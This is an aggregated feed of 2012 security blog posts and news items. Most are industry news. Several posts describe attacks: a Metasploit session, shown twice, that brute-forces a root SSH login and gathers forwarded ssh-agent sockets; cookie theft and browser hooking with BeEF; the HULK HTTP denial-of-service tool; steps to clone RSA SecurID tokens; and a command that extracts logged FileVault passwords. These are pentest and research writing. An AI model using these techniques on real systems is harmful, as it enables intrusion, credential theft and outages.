Sipcrack – SIP login dumper/cracker
Ettercap – Multipurpose sniffer/interceptor/logger for switched LAN
Etherape – Graphical network monitor
Bleachbit – Delete unnecessary files from the system
Wipe – Secure file deletion
Scrub – Writes patterns on magnetic media to thwart data recovery
Rkhunter – Rootkit, backdoor, sniffer and exploit scanner
Lynis – Security auditing tool for Unix based systems
Proxychains – Redirect connections through proxy servers
Tsocks – Transparent network access through a SOCKS 4 or 5 proxy
Privoxy – Privacy enhancing HTTP Proxy
I2P – Anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate
Tor – Anonymizing overlay network for TCP
Vidalia – Controller GUI for Tor
Torsocks – Use socks-friendly applications with Tor
Tor-Arm – Terminal status monitor for Tor
Torchat – Decentralized instant messenger built on top of the Tor Network
Arkose – Desktop application sandboxing

ICASI Releases Update To XML Framework For Reporting IT System Vulnerabilities

Dark Reading — Thu, 17 May 2012 13:57:00 +0000

Enhancements in CVRF 1.1 offer users a more comprehensive and flexible format

Viewfinity Releases Next-Gen Privilege Management Software

Dark Reading — Thu, 17 May 2012 13:53:00 +0000

Viewfinity Privilege Management 4.0 automatically sets policies for rights and privileges

The Hot Topic at the Cloud Computing Conference in Tel Aviv

Yaron Azerual — Thu, 17 May 2012 13:51:48 +0000

A couple of weeks ago I was asked to speak at the Cloud Computing Conference in Tel Aviv to present the Radware cloud ready Virtual Application Delivery Fabric. With some luck, I had a fortuitous meeting with the conference organizer prior to the event. I was able to discern the hot issue for the attendee base: security. The reason was clear as a prominent website suffered a highly publicized series of cyber attacks just prior to the convention.

Why fortuitous you ask? It gave me the chance to understand attendees’ interest in security, and in turn use the
opportunity to explain how ADC virtualization should be done differently in the cloud than in the private data center. By this, I mean preventing the weakest link, a single customer from taking down the entire infrastructure and affecting other customers residing on the shared network. The most important reason for using cloud services is cost savings. Cloud services achieve this cost saving by sharing infrastructure resources. For example, running multiple virtual machines on a single physical server, or sharing storage, or sharing ADCs.

Most customers would assume their cloud services and data are isolated from other hosted cloud services and customers; this is probably true in the logical sense that neighboring customers won’t have access to their servers and data, but what happens in the case of a DDoS attack on a neighboring hosted website or service? During the attack, the neighboring website receives a massive amount of traffic, which overloads its infrastructure resources and takes it down; this includes the application, the server and the ADC in front of it. Now, even if the cloud provider has isolated the different hosted services on the network level, and configured different routing domains per service in the ADC, the ADC processing capacity is still shared, and an attack through one of the ADC services will consume all of its processing resources and bring down all sites using the same shared ADC.

How does the DC administrator prevent this? Implement a VADF (virtual Application Delivery Fabric), cloud computing should simply use the same methodology as used by server/storage virtualization: Use a hypervisor layer on top of the ADC computing resources which will isolate each service not only on the network logical layer (e.g. as done with routing domains), but also isolate each service running through the ADC fabric and guarantee their capacity, computing resource and guarantee overall SLA. If a hosted websites is under a DDoS attack, other websites sharing the same physical ADC will still receive their guaranteed processing resources and won’t be affected by attacks on their neighbor.

Still, a question remains: how can an ADC virtualization solution be scalable and cost effective? For a solution to be feasible in the cloud environment it must provide high enough density of virtual ADCs per computing resource, consume as little physical footprint in the cloud datacenter as possible and reduce the cost per customer. The ADC virtualization solution should also converge into the cloud’s management and orchestration systems. Provisioning and maintenance of the ADC service per customer must be done in full correlation with all other elements of the cloud computing resources and be able to scale on demand.

Radware’s Virtual Application Delivery Infrastructure (VADI™) solution for the cloud addresses all of the above. The virtual ADCs running on any of the Alteon-VX models provide full isolation of applications, and guarantee the computing resources and capacity per virtual ADC instance even when under massive attack. Moreover, with a density of up to 256 vADCs per Alteon-VX device and the ability to cluster, cloud providers can achieve a cost effective ADC virtualization fabric with minimal footprint in their datacenter. The VADI solution also includes another important component – the vDirect plug-in provides for complete integration into the data center’s eco system, which enables streamlining the ADC service provisioning together with the other cloud service components, through smooth integration with any cloud management and orchestration systems.

In closing, a family would not be happy if a neighbor in their housing complex used up their allocated water supply, and then just tapped into the neighborhood supply and used all of the water for the entire community. There needs to be measures of control. Landlords just like cloud service providers must be able to guarantee isolated availability of resources.

Arxan Introduces End-to-End Protection Of Java And Native Apps

Dark Reading — Thu, 17 May 2012 13:50:00 +0000

Enhances Mobile Application Protection Suite to include multilayered, end-to-end protection for Android applications

Plugin Spotlight: Mac OS X FileVault Plaintext Password Logging

Paul Asadoorian — Thu, 17 May 2012 13:45:00 +0000

Encryption is Only as Strong as the Key

In this case, encryption breaks down because the OS X user's password (used to unlock an encrypted volume) is logged in clear-text via debugging function to a system-wide readable log file. In this scenario, a user running Mac OS X 10.7.3 would encrypt their drive using File Vault, which is included with OS X and encrypts the entire contents of your hard drive. When your system boots up, or you access your files over AFP (Apple's File Sharing Protocol), the system uses your password to decrypt the contents of the drive and your home folder. Debugging in vulnerable versions was enabled such that the password was logged in plain-text to /var/log/secure.log, as follows:

25/04/2012 13:12:12.340 authorizationhost: DEBUGLOG | -[HomeDirMounter mountNetworkHomeWithURL:attributes:dirPath:usernam e:] | about to call _premountHomedir. url = afp://mymacbookpro, userPathComponent = paul, userID = 001, name = paul, passwordAsUTF8String = mysupersecretpassword

As this logging event could be repeated over time, and a history of the "secure.log" is stored on disk for potentially months, an attacker could easily gain knowledge of the File Vault password. As Apple states in their advisory, "A local attacker in the admin group or an attacker with physical access to the host could exploit this to get user passwords, which could be used to gain access to encrypted partitions."

Finding the Vulnerability on Your Systems

The problem arises that even after a patch has been installed, the passwords could still be buried in the system log archives. Provided Nessus has credentials to the target system(s), Plugin 59090 - Mac OS X FileVault Plaintext Password Logging will detect the presence of passwords in the system logs and log archives. The results of the plugin look as follows:

Mac OS X FileVault Plaintext Password Logging (click for larger image)

Be certain the credentials you've provided are of a user in the admin group on the OS X target(s). The command run locally on the system is as follows:

/usr/bin/bzcat /var/log/secure.log.?.bz2 2> /dev/null | /bin/cat /var/log/secure.log - 2> /dev/null | /usr/bin/grep ': DEBUGLOG |.*, password[^ ]* ='"

The first two commands, bzcat and cat, dump the contents of the archived and current log files potentially containing the password. The grep command in the second half searches the output for lines containing the pattern corresponding to the password itself.

How The Social Security Administration Making Online Access To Earnings Secure For Consumers

Dark Reading — Thu, 17 May 2012 13:40:00 +0000

Experian fraud prevention services help SSA provide consumers with secure and convenient online access to their Social Security earnings and benefit information

What Matters in A Standard: RSA DPM support for OASIS KMIP

Bob Griffin — Thu, 17 May 2012 13:30:34 +0000

This week’s announcement that the new release of RSA Data Protection Manager (DPM) supports the OASIS Key Management Interoperability Protocol (KMIP) standard was a particularly important one for me, personally. As co-chair of the KMIP Technical Committee since we convened it in 2009, implementation of KMIP in industry-leading key managers like RSA DPM matters a lot to me. And that got me thinking about what matters in a standard like KMIP.

When OASIS published the call for participation in a new Key Management Interoperability Protocol committee, EMC’s Chuck Hollis published a very insightful blog about that new standards effort. There are several things that were essential to a successful standard, he wrote. One of the most important is that the standard solves a real problem, one that matters. As the convener for the KMIP TC and its co-chair, I’ve been spokesperson for KMIP in lots of situations: in conferences, in customer meetings, in discussions with other standards groups and many other forums. Whether I was in Beijing or Berlin, San Francisco or Sao Paulo, the starting point of the discussion has always been the problem we need to solve: the costs and risks resulting from multiple contradictory protocols between key clients and key servers.

(used with OASIS permission)

It’s a real and substantial problem. It needs a real and substantial solution. And that’s what we’ve defined in KMIP. KMIP isn’t going to solve world hunger. But it is an effective and versatile protocol for key management across a range of use cases. Creating and validating it has been a lot of work from a lot of folks from a lot of organizations. Judging by the effort that’s been invested into it, it’s a standard that matters.

(used with OASIS permission)

In the final analysis, a standard is only valuable if it’s put to use. And that’s why the announcement this week of KMIP support in the most recent release of RSA DPM is so important. We at RSA invest a lot of time and effort in promoting industry standards. But we also devote a lot of time and effort building standards into our products, as we have done with KMIP and DPM. And that is what matters most of all.

RSA Helps Accelerate Adoption Of Encryption Key Management Interoperability With KMIP-Enabled Solution

Dark Reading — Thu, 17 May 2012 13:18:00 +0000

Integrates KMIP 1.0 in RSA Data Protection Manager

Where is your first line of defense?

Branden Williams — Thu, 17 May 2012 13:11:47 +0000

I recently attended a fantastic roundtable put on by Financial Times in New York and as I’m sitting listening to a group of folks that specialize in anti-money laundering and fraud, one person stated that people detected the vast majority of fraud or money laundering with tools playing a supporting role.

By itself, this seems to be a bit damning toward the technical sector essentially stating that they aren’t any good at detecting fraud. Or at least their tools aren’t any good. But technology has always played a catch-up role when compared to human intuition. It could be simple things like highlighting the right statistical inconsistencies for analysts or complex things like playing chess against the world’s best, but we’re all still trying to mimic a human (with scale) by building intelligence into systems.

Stop!, by Qfamily

So this really begs the question, whether you are in the information security business or the fraud prevention business, where is your first line of defense? I’m willing to bet it falls in line with the observations from the roundtable and it is entirely human focused. But I’m also willing to bet that your company realizes this plan isn’t scalable and is trying to find ways to build human intelligence artificially into our infrastructure to aid the humans. For example, humans cannot read millions of logs manually, they have systems that triage mountains of work into molehills of actions for further analysis.

So the question becomes, how do we accelerate this so we can get to the point of more front-line defenses being built into artificial intelligence instead of relying almost solely on human intuition?

Companies require comprehensive visibility into events into their network with the ability to incorporate both internal and external sources of intelligence to create actionable intelligence that can feed an automated, agile control set. Sure, it sounds a little like the beginnings of Skynet, but those that fear the rise of the machines may choose to build the intelligence without the capacity to act, thus still requiring human interaction but theoretically with better information. The goal still needs to be furthering our ability to transfer human intelligence into systems to help us do more with less (and reliably!).

Possibly Related Posts:

Mac Malware Underscores Why You Can’t Ignore Web Security Threats

Kevin Beaver — Thu, 17 May 2012 13:09:29 +0000

Looks like the Mac is finally getting what’s been coming: malware. And lots of it just recently with the Flashback infection that apparently impacted up to 700,000 Macs. We’ve all heard it from the Mac bigots: One of the main reasons I use a Mac is because of all those viruses and junk on Windows. I can understand that logic. Macs have indeed flown under the radar for years. But now that they’re in the spotlight, they’re a target for criminal hackers and others with nothing better to do.

I could wax poetic over Macs and malware but that’s not what I have on my mind. Instead, it’s all those darned WordPress sites that are unmaintained, exposed to web security threats and waiting to become a part of the web security problem. The recent version 3.3.2 update of WordPress fixes a slew of problems including Cross-Site Scripting and Cross-site request forgery. Sure, these may not be a huge problem to a local bakery or landscaper that maintains his or her web presence on WordPress. Instead, it underscores how many under-secured and flat out mis-managed WordPress-based sites there are on the web.

As the Flashback botnet has shown us, someone with an unsecured website no longer has just a personal problem. It’s creating an Internet problem. Heck, if application security only impacted people and businesses and nothing else, we’d all be out of work. The way I see it is these people choosing to ignore web security threats are creating hazards for the entire web. This is something that’s been impacting Windows systems for years. Now it’s time for Macs to get in the ring.

There’s a universal law that applies to everything we do in life and work: you cannot fix what you don’t acknowledge. Nor can you secure it. If you have your own WordPress sites, bring them under the umbrella of web security testing so you can fix the silly low-hanging fruit that’s waiting to be exploited. Acunetix Web Vulnerability Scanner can help. On top of that, look at some of the technologies like Acunetix’s new product WebsiteDefender that help lock down and monitor WordPress and similar platforms for malware and other web security threats. Whatever you do, just do something.

‘Like’ the Acunetix Facebook Page to receive updates on the latest security news. Also follow us on Twitter and read the Acunetix Blog.

ssh-agent: Abusing the trust – Part 2

wicky — Thu, 17 May 2012 13:08:39 +0000

In part 1 of this blog post I discussed common issues with using ssh-agent forwarding in an untrusted environment. Despite the risks it remains prevalent in my experience and ripe for some exploitation.

There are tools out there to help exploit this scenario, the main one I know about is secret-agent but I’ve been working on integrating this attack into everyone’s favourite framework for rapid exploit development, metasploit (MSF).

Right now, I’ve completed work on an enumeration post module called enum_ssh_agents. This can be used to identify any potential agents being forwarded through a box you’ve popped with metasploit. Later in this post I’ve outlined my roadmap for this tool, there’s definitely some opportunities but I need to make some more tweaks to the core MSF to allow it.

Here’s how to use the post module.

enum_ssh_agents

I’ll assume you have achieved root access to a box in metasploit and have at least one root level session you can run a post module against. If you’re following along at home we can quickly achieve that through the ssh_login auxiliary module. In this scenario our root credentials on debian1 are root/toor:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS debian1
RHOSTS => debian1
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(ssh_login) > run

[*] 192.168.1.60:22 SSH – Starting bruteforce
[*] 192.168.1.60:22 SSH – [1/3] – Trying: username: ‘root’ with password: ”
[-] 192.168.1.60:22 SSH – [1/3] – Failed: ‘root’:”
[*] 192.168.1.60:22 SSH – [2/3] – Trying: username: ‘root’ with password: ‘root’
[-] 192.168.1.60:22 SSH – [2/3] – Failed: ‘root’:'root’
[*] 192.168.1.60:22 SSH – [3/3] – Trying: username: ‘root’ with password: ‘toor’
[*] Command shell session 1 opened (192.168.1.250:50870 -> 192.168.1.60:22) at 2012-04-18 13:44:43 +0100
[+] 192.168.1.60:22 SSH – [3/3] – Success: ‘root’:'toor’ ‘uid=0(root) gid=0(root) groups=0(root) Linux debian1 2.6.32-5-686-bigmem #1 SMP Mon Oct 3 05:03:32 UTC 2011 i686 GNU/Linux ‘
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Hurrah, session 1 opened. Now we can execute our post module to enumerate any SSH agents which may be available.

msf auxiliary(ssh_login) > use post/linux/gather/enum_ssh_agents
msf post(enum_ssh_agents) > set SESSION 1
SESSION => 1
msf post(enum_ssh_agents) > run

[*] Enumerating as root
[!] platform is linux
[*] SSH agent socket stored in /root/.msf4/loot/20120419095036_default_192.168.1.60_linux.enum.ssh_a_332108.txt
[!] platform is linux
[*] SSH agent socket stored in /root/.msf4/loot/20120419095036_default_192.168.1.60_linux.enum.ssh_a_275927.txt
[!] platform is linux
[*] SSH agent socket stored in /root/.msf4/loot/20120419095037_default_192.168.1.60_linux.enum.ssh_a_589857.txt
[!]
[*] Post module execution completed

Great, we’ve found some and saved the details to loot.

msf post(enum_ssh_agents) > loot

Loot
====

host service type name content info path
—- ——- —- —- ——- —- —-
192.168.1.60 linux.enum.ssh_agents ssh_agent_socket text/plain SSH agent socket /root/.msf4/loot/20120419095218_post_192.168.1.60_linux.enum.ssh_a_227695.txt
192.168.1.60 linux.enum.ssh_agents ssh_agent_socket text/plain SSH agent socket /root/.msf4/loot/20120419095218_post_192.168.1.60_linux.enum.ssh_a_910544.txt
192.168.1.60 linux.enum.ssh_agents ssh_agent_socket text/plain SSH agent socket /root/.msf4/loot/20120419095217_post_192.168.1.60_linux.enum.ssh_a_377311.txt

At the moment the module saves details of an agent as a colon delimited entry in a text file:

msf post(enum_ssh_agents) > cat /root/.msf4/loot/20120419095218_post_192.168.1.60_linux.enum.ssh_a_227695.txt
[*] exec: cat /root/.msf4/loot/20120419095218_post_192.168.1.60_linux.enum.ssh_a_227695.txt

pwnme:/tmp/ssh-JeCGlj2407/agent.2407

Roadmap

The roadmap for this module is to develop a way to pivot through the box where we have root and use the ssh-agents to scan/exploit further boxes beyond it. I already have some proof of concept code which can forward the ssh-agent back to our metasploit box for use in the scanning, and using metassh (which rocks btw) I can perform the pivot. The limitation is that the PoC code has to be executed on the root box and it’s written in Ruby which isn’t always installed.

I’m toying with the idea of rewriting it in Perl as that is nearly always available but that makes me feel a bit wrong. For now, a practical alternative is to upload socat to the root box and forward the agent back that way but the current metasploit ssh modules don’t support agent based authentication so I’ve got that to work on too.

Code

If you want to play around with this yourself you need two things. A version of the metasploit framework which includes my patch to lib/msf/core/post/file.rb and the post module itself. You can get both of these from my Github page at https://github.com/marcwickenden. I’ve submitted a pull request to the metasploit guys so hopefully the patch to file.rb will be available in the main code soon. Once this post module matures a little I will submit some more for inclusion.

More Data Breach Fallout, Expense For Utah Department Of Health

Tim Whitman — Thu, 17 May 2012 13:07:28 +0000

The state of Utah is hiring a public relations firm to handle “crisis communications” in the wake of a health data breach that put the personal information of 780,000 people at risk.

The contract will be short-lived and will cost between $100,000 and $200,000, according to a solicitation published on May 11.

It calls for building a communications plan to “rebuild trust with the public, specifically those who were directly impacted by the breach and those who rely on the [Utah Department of Health] for critical health services.”

Click for complete article >>

ssh-agent: Abusing the trust – Part 2

Marc Wickenden — Thu, 17 May 2012 12:59:00 +0000

In part 1 of this blog post I discussed common issues with using ssh-agent forwarding in an untrusted environment. Despite the risks it remains prevalent and ripe for some exploitation.

There are tools out there to help exploit this scenario, the main one I know about is secret-agent but I've been working on integrating this attack into everyone's favourite framework for rapid exploit development, metasploit (MSF).

Right now, I've completed work on an enumeration post module called enum_ssh_agents. This can be used to identify any potential agents being forwarded through a box you've popped with metasploit. Later in this post I've outlined my roadmap for this tool, there's definitely some opportunities but I need to make some more tweaks to the core MSF to allow it.

Here's how to use the post module.

enum_ssh_agents

I'll assume you have achieved root access to a box in metasploit and have at least one root level session you can run a post module against. If you're following along at home we can quickly achieve that through the ssh_login auxiliary module. In this scenario our root credentials on debian1 are root/toor:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS debian1
RHOSTS => debian1
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(ssh_login) > run

[*] 192.168.1.60:22 SSH - Starting bruteforce
[*] 192.168.1.60:22 SSH - [1/3] - Trying: username: 'root' with password: ''
[-] 192.168.1.60:22 SSH - [1/3] - Failed: 'root':''
[*] 192.168.1.60:22 SSH - [2/3] - Trying: username: 'root' with password: 'root'
[-] 192.168.1.60:22 SSH - [2/3] - Failed: 'root':'root'
[*] 192.168.1.60:22 SSH - [3/3] - Trying: username: 'root' with password: 'toor'
[*] Command shell session 1 opened (192.168.1.250:50870 -> 192.168.1.60:22) at 2012-04-18 13:44:43 +0100
[+] 192.168.1.60:22 SSH - [3/3] - Success: 'root':'toor' 'uid=0(root) gid=0(root) groups=0(root) Linux debian1 2.6.32-5-686-bigmem #1 SMP Mon Oct 3 05:03:32 UTC 2011 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Hurrah, session 1 opened. Now we can execute our post module to enumerate any SSH agents which may be available.

msf auxiliary(ssh_login) > use post/linux/gather/enum_ssh_agents
msf post(enum_ssh_agents) > set SESSION 1
SESSION => 1
msf post(enum_ssh_agents) > run

[*] Enumerating as root
[!] platform is linux
[*] SSH agent socket stored in /root/.msf4/loot/20120419095036_default_192.168.1.60_linux.enum.ssh_a_332108.txt
[!] platform is linux
[*] SSH agent socket stored in /root/.msf4/loot/20120419095036_default_192.168.1.60_linux.enum.ssh_a_275927.txt
[!] platform is linux
[*] SSH agent socket stored in /root/.msf4/loot/20120419095037_default_192.168.1.60_linux.enum.ssh_a_589857.txt
[!]
[*] Post module execution completed

Great, we've found some and saved the details to loot.

msf post(enum_ssh_agents) > loot

Loot
====

host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.168.1.60 linux.enum.ssh_agents ssh_agent_socket text/plain SSH agent socket /root/.msf4/loot/20120419095218_post_192.168.1.60_linux.enum.ssh_a_227695.txt
192.168.1.60 linux.enum.ssh_agents ssh_agent_socket text/plain SSH agent socket /root/.msf4/loot/20120419095218_post_192.168.1.60_linux.enum.ssh_a_910544.txt
192.168.1.60 linux.enum.ssh_agents ssh_agent_socket text/plain SSH agent socket /root/.msf4/loot/20120419095217_post_192.168.1.60_linux.enum.ssh_a_377311.txt

At the moment the module saves details of an agent as a colon delimited entry in a text file:

msf post(enum_ssh_agents) > cat /root/.msf4/loot/20120419095218_post_192.168.1.60_linux.enum.ssh_a_227695.txt
[*] exec: cat /root/.msf4/loot/20120419095218_post_192.168.1.60_linux.enum.ssh_a_227695.txt

pwnme:/tmp/ssh-JeCGlj2407/agent.2407

Roadmap

The roadmap for this module is to develop a way to pivot through the box where we have root and use the ssh-agents to scan/exploit further boxes beyond it. I already have some proof of concept code which can forward the ssh-agent back to our metasploit box for use in the scanning, and using metassh (which rocks btw) I can perform the pivot. The limitation is that the PoC code has to be executed on the root box and it's written in Ruby which isn't always installed.

I'm toying with the idea of rewriting it in Perl as that is nearly always available but that makes me feel a bit wrong. For now, a practical alternative is to upload socat to the root box and forward the agent back that way but the current metasploit ssh modules don't support agent based authentication so I've got that to work on too.

Code

If you want to play around with this yourself you need two things. A version of the metasploit framework which includes my patch to lib/msf/core/post/file.rb and the post module itself. You can get both of these from our Github page at https://github.com/7Elements/metasploit-framework. I've got some polish to add to this before the MSF guys will accept a pull request to the framework but that will be done soon.

Call of Duty Trojan horse creator ends up in jail, after drunken college raid

Graham Cluley — Thu, 17 May 2012 12:42:22 +0000

A British man who spread a spyware Trojan horse posing as a patch for the popular video game "Call of Duty", has ended up with an 18 month jail sentence.

About me, myself and BeEF

Antisnatchor — Thu, 17 May 2012 12:28:18 +0000

Hello followers of SpiderLabs Anterior.

I’m Michele “antisnatchor” Orru, a new Senior Spider that recently joined the Application Security team in EMEA (London). I love both writing and breaking code. That’s why I particularly like source code analysis, debuggers and delve my hands deeper on software internals.

Coming from a strong Java Enterprise development background for various years, I got into Ruby a few years ago when I heard that Wade Alcorn, the creator of the BeEF project, wanted to rewrite the whole framework from scratch. So finally no more PHP that I always hated, especially when writing and securing code for customers. I had a lot of friends that were definitely happy after the Java to Ruby transition, so I joined the BeEF project. I wrote a technical article regarding why PHP BeEF is discontinued and why you should use the Ruby BeEF in our blog.

You will now be wondering what the hell is BeEF :D

[Figure 1: BeEF console logs. Note the new hooked browsers Firefox and Safari]

BeEF is a powerful platform for client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse. Every browser is in a different security context: browser and operating system type/version, plugins installed, specific domain hooked could open different security holes. Imagine Internet Explorer 8 on Windows XP-SP3 lacking patches, vulnerable to the Aurora exploit, or maybe Firefox fully patched with a vulnerable Java plugin. The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context.

[Figure 2: BeEF admin console. Here you can control your hooked browsers]

Lets discuss a practical example. You are able to inject Javascript code in a web application, for example using XSS or HTTP Response Splitting. You’re happy to see a lame alert box popping up in your screen, and you send to the pentest requestor - your customer – tons of vectors with alert(1).

You’re clever, you’re a sla.cke.r and you use a known vector to bypass Chrome 18 XSS filter:

Wait, you can be smarter and send document.cookie to your PHP page. You modify your vector as the following:

Cool, but what if the web application prevents Session Hijacking checking for UserAgent, source IP, browser type and version and so on? You would say…ok UserAgent is spoofable, but what about the source IP or whatever other security mechanisms implemented by the web application?

So, to solve the problem, you inject the BeEF hook and use the Tunneling Proxy feature. This allows you to proxy requests through the victim browser, so her browser will effectively request resources you want and send back the results.

You modify your vector in order to dynamically load an external script, the BeEF hook. After applying some very simple encoding iterations, your script will become:

In it’s plain form this is basically:

Source IP protections, UserAgent and so on will not be effective in this case, and forensics will also have an hard job to detect what happened (like, who added that admin user? Looks legitimate!)

In the next article we’ll see the Tunneling Proxy internals, including the new cutting-edge WebSockets support that will increase the speed of the proxy almost to real-time. Stay tuned!

HULK, Web Server DoS Tool

Barry Shteiman — Thu, 17 May 2012 12:00:42 +0000

Introducing HULK (Http Unbearable Load King).

In my line of work, I get to see tons of different nifty hacking tools, and traffic generation tools that are meant to either break and steal information off a system, or exhaust its resource pool, rendering the service dead and putting the system under a denial of service.

For a while now, I have been playing with some of the more exotic tools, finding that their main problem is always the same… they create repeatable patterns. too easy to predict the next request that is coming, and therefor mitigate. Some, although elegant, lack the horsepower to really put a system on its knees.

For research purposes, I decided to take some of the lessons I’ve learned over time and practice what I preach.

Enforcing Python’s engines, I wrote a script that generates some nicely crafted unique Http requests, one after the other, generating a fair load on a webserver, eventually exhausting it of resources. this can be optimized much much further, but as a proof of concept and generic guidance it does its job.

As a guideline, the main concept of HULK, is to generate Unique requests for each and every request generated, thus avoiding/bypassing caching engines and effecting directly on the server’s load itself.

I have published it to Packet Storm, as we do.

Some Techniques

Obfuscation of Source Client – this is done by using a list of known User Agents, and for every request that is constructed, the User Agent is a random value out of the known list
Reference Forgery – the referer that points at the request is obfuscated and points into either the host itself or some major prelisted websites.
Stickiness – using some standard Http command to try and ask the server to maintain open connections by using Keep-Alive with variable time window
no-cache – this is a given, but by asking the HTTP server for no-cache , a server that is not behind a dedicated caching service will present a unique page.
Unique Transformation of URL – to eliminate caching and other optimization tools, I crafted custom parameter names and values and they are randomized and attached to each request, rendering it to be Unique, causing the server to process the response on each event.

Results

Basically my test web server with 4gb of Ram running Microsoft IIS7 was brought to its knees under less than a minute, running all requests from a single host.

In the pictures below you can see the tool in action, where it first ( #1 ) executed against a URL, and then the tool starts generating a load of unique requests and sending over the target server ( host of the URL ), and second ( #2 ) we can see that the server at some point starts failing to respond since it has exhausted its resource pool.

Note the “safe” word is meant to kill the process after all threads got a 500 error, since its easier to control in a lab, it is optional.

Download

File : hulk.py ( zip file )

The tool is meant for educational purposes only, and should not be used for malicious activity of any kind.

iPhone 5 release date & 4-inch rumors all-but confirmed . #ITBW by + Richi Jennings for +…

Richi Jennings — Thu, 17 May 2012 10:02:03 +0000

iPhone 5 release date & 4-inch rumors all-but confirmed.
#ITBW by +Richi Jennings for +Computerworld $AAPL

http://blogs.computerworld.com/20187/iphone_5_release_date_4_inch_rumors_all_but_confirmed

iPhone 5 release date & 4-inch rumors all-but confirmed

A closer look into the RSA SecureID software token

extern blog SensePost; — Thu, 17 May 2012 09:57:00 +0000

Widespread use of smart phones by employees to perform work related activities has introduced the idea of using these devices as an authentication token. As an example of such attempts, RSA SecureID software tokens are available for iPhone, Nokia and the Windows platforms. Obviously, mobile phones would not be able to provide the level of tamper-resistance that hardware tokens would, but I was interested to know how easy/hard it could be for a potential attacker to clone RSA SecureID software tokens. I used the Windows version of the RSA SecurID Software Token for Microsoft Windows version 4.10 for my analysis and discovered the following issues:

Device serial number of tokens can be calculated by a remote attacker :

Every instance of the installed SecurID software token application contains a hard drive plug-in (implemented in tokenstoreplugin.dll) that has a unique device serial number. This serial number can be used for "Device Binding" and the RSA documentation defines it as follows:

“Before the software token is issued by RSA Authentication Manager, an additional extension attribute () can be added to the software token record to bind the software token to a specific devicedevice serial number is used to bind a token to a specific device. If the same user installs the application on a different computer, the user cannot import software tokens into the application because the hard drive plug-in on the second computer has a different device serial number from the one to which the user's tokens are bound”.

Reverse engineering the Hard-Disk plugin (tokenstoreplugin.dll) indicated that the device serial number is dependent on the system's host name and current user's windows security identifier (SID). An attacker, with access to these values, can easily calculate the target token's device serial number and bypass the above mentioned protection. Account SIDs can be enumerated in most of the Microsoft active directory based networks using publicly available tools, if the “enumeration of SAM accounts and shares” security setting was not set to disabled. Host names can be easily resolved using internal DNS or Microsoft RPC. The following figures show the device serial number generation code:

The SecureID device serial number calculation can be represented with the following formula:

Token's copy protection:

The software token information, including the secret seed value, is stored in a SQLite version 3 database file named RSASecurIDStorage under the “%USERPROFILE%\Local Settings\Application Data\RSA\RSA SecurID Software Token Library” directory. This file can be viewed by any SQLite database browser, but sensitive information such as the checksum and seed values are encrypted. RSA documentation states that this database file is both encrypted and copy protected: “RSA SecurID Software Token for Windows uses the following data protection mechanisms to tie the token database to a specific computer:

• Binding the database to the computer's primary hard disk drive

• Implementing the Windows Data Protection API (DPAPI)

These mechanisms ensure that an intruder cannot move the token database to another computer and access the tokens. Even if you disable copy protection, the database is still protected by DPAPI.”

The RSASecurIDStorage database file has two tables: PROPERTIES and TOKENS. The DatabaseKey and CryptoChecksum rows found in the PROPERTIES tables were found to be used for copy protection purpose as shown in the figure below:

Reverse engineering of the copy protection mechanism indicated that:

The CryptoChecksum value is encrypted using the machine's master key, which can only be decrypted on the same computer system, unless the attacker can find a way to import the machine key and other supporting data to their machine
The DatabaseKey is encrypted using the current logged-on user's master key and provides token binding to that user account

Previous research on the Microsoft Windows DPAPI internals has made offline decryption of the DPAPI protected data possible. This means that if the attacker was able to copy the RSA token database file along with the encryption master keys to their system (for instance by infecting a victim's machine with a rootkit), then it would be possible to decrypt the token database file on their machine. The detailed attack steps to clone a SecurID software token by copying the token database file from a victim's system are as follows:

Copy the token database file, RSASecurIDStorage, from the user profile directory
Copy the user's master key from %PROFILEDIR%\Application Data\Microsoft\Protect\%SID%; the current master key's GUID can be read from Preferred file as shown in the figure below:

Copy the machine's master key from the %WINDIR%\system32\Microsoft\Protect\ directory. Microsoft Windows protects machine keys against tampering by using SHA1 hash values, which are stored and handled by the Local Security Authority Subsystem Service (LSASS) process in Microsoft Windows operating systems. The attacker should also dump these hash values from LSA using publicly available tools like lsadump.

Having all the required master keys and token database file, install and deploy a windows machine and change the machine and user SIDs to the victim's system SID by using available tools such as newSID.
Overwrite the token database file, user and machine master keys with the ones copied from victim's system. You would also need to find a way to update the DPAPI_SYSTEM value in LSA secrets of the Windows machine. Currently, this is the only challenge that I was not able to solve , but it should be possible to write a tool similar to lsadump which updates LSA secrets.
When the above has been performed, you should have successfully cloned the victim's software token and if they run the SecurID software token program on your computer, it will generate the exact same random numbers that are displayed on the victim's token.

In order to demonstrate the possibility of the above mentioned attack, I installed and activated token A and token B on two separate windows XP virtual machines and attempted to clone token B on the virtual machine that was running token A. Taking the above steps, token B was successfully cloned on the machine running token A as shown in the following figures:

In order to counter the aforementioned issues, I would recommend the use of "trusted platform module" (TPM) bindings, which associates the software token with the TPM chip on the system (TPM chip for mobiles? there are vendors working on it).

British hacker jailed for one year for breaking into Facebook account

Graham Cluley — Thu, 17 May 2012 09:40:46 +0000

Southwark Crown Court has sentenced a 21-year-old British man to a jail in prison after he admitted hacking into the Facebook account of a US citizen, and accessing private messages.

SSCC 90 – A walk around Interop 2012 with John Shier

Chester Wisniewski — Thu, 17 May 2012 09:01:53 +0000

This week's Chet Chat comes to you live from the show floor at Interop 2012. John Shier and Chet Wisniewski have some fun and share highlights from the expo hall.

‘I Was a Teenage Telecommuter’ – Harsh Lessons for Me and my Boss . Painfully honest…

Richi Jennings — Thu, 17 May 2012 08:55:43 +0000

'I Was a Teenage Telecommuter' – Harsh Lessons for Me and my Boss.

Painfully honest lessons from +Gareth Roberts for +HPUK...

